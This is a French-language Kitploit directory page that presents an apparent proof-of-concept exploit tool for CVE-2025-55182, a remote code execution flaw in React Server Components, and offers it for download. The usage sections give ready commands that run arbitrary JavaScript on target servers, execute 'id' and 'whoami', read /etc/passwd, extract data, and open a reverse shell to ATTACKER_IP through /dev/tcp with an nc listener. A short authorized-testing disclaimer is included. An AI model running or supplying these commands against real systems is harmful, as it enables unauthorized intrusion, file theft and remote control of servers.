Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
Outils/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 8 moisPas encore vérifié

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

Scanner d'exécution de code à distance pour les composants serveur React (RSC)

CVE Python


Crédits

RôleNomLien
Recherche originaleLachlan Davidsongithub.com/lachlan2k

Basé sur le PoC original : React2Shell-CVE-2025-55182-original-poc


Présentation

React2Shell est un scanner de sécurité complet pour CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance (RCE) affectant les implémentations des composants serveur React (RSC). Cette vulnérabilité permet à des attaquants non authentifiés d'exécuter du code JavaScript arbitraire sur le serveur via une désérialisation non sécurisée dans le protocole React Flight.

Fonctionnalités principales

  • Tests multi-variantes : Teste 4 structures de payload différentes issues de la recherche originale
  • Détection de version : Identifie les versions vulnérables de React et des frameworks
  • Vérification RCE : Confirme l'exécution de code via variation de digest, timing et callbacks OOB
  • Tests OOB : Prise en charge de Burp Collaborator et Interactsh
  • Payloads personnalisés : Exécute du JavaScript arbitraire sur les serveurs vulnérables
  • Extraction de données : Exfiltration de données caractère par caractère
  • Sortie professionnelle : Sortie terminal propre et colorée avec collecte de preuves

Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Install dependencies
pip install requests

# Run the scanner
python3 exploit_cve_2025_55182_v2.py -h

Utilisation

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

Modes de scan

1. Mode Version (par défaut)

Détecte passivement les versions vulnérables de React et des frameworks :

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. Mode Verify (-m verify)

Confirme activement la RCE en utilisant plusieurs techniques et les 4 variantes de payload :

root@kitploit:~
# Basic verification (digest variation)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# With time-based verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# With OOB callback (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# Full verification with verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. Mode Custom (-m custom)

Exécute des payloads JavaScript arbitraires :

root@kitploit:~
# Get Node.js version
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Execute system command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# Read file
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. Scan par lots (-f)

Scanne plusieurs URL à partir d'un fichier et affiche uniquement les cibles vulnérables :

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

Exemples

Scans de base

root@kitploit:~
# Version detection (default mode)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# RCE verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Batch scan multiple targets
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# Verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

Utilisation avancée

root@kitploit:~
# Time-based + OOB verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# Extract server info
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Execute command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

Reverse Shell

root@kitploit:~
# Start listener
nc -lvnp 443

# Execute reverse shell
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et éducatives.

  • Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test
  • L'accès non autorisé à des systèmes informatiques est illégal
  • Les auteurs ne sont pas responsables d'une mauvaise utilisation de cet outil
  • Suivez toujours les pratiques de divulgation responsable

Références

  • CVE-2025-55182 - NVD
  • PoC original par Lachlan Davidson
  • Avis de sécurité React
  • Avis de sécurité Next.js
  • Documentation des composants serveur React
Télécharger l’outil
ArgumentDescription
-t, --targetURL cible (ex : https://example.com)
-f, --fileFichier contenant une liste d'URL (une par ligne) pour un scan par lots
-m, --modeMode de scan : version (par défaut), verify ou custom
--jsCode JavaScript pour le mode custom
--extractExtraire le résultat sous forme de chaîne caractère par caractère
--sleep SECONDSVérification RCE basée sur le temps (mode verify)
--callback URLURL de callback HTTP pour les tests OOB (mode verify)
--dns DOMAINDomaine de callback DNS pour les tests OOB (mode verify)
-v, --verboseSortie verbeuse avec détails des payloads
--no-colorDésactiver la sortie colorée
--timeout SECONDSDélai d'expiration de la requête HTTP (par défaut : 30)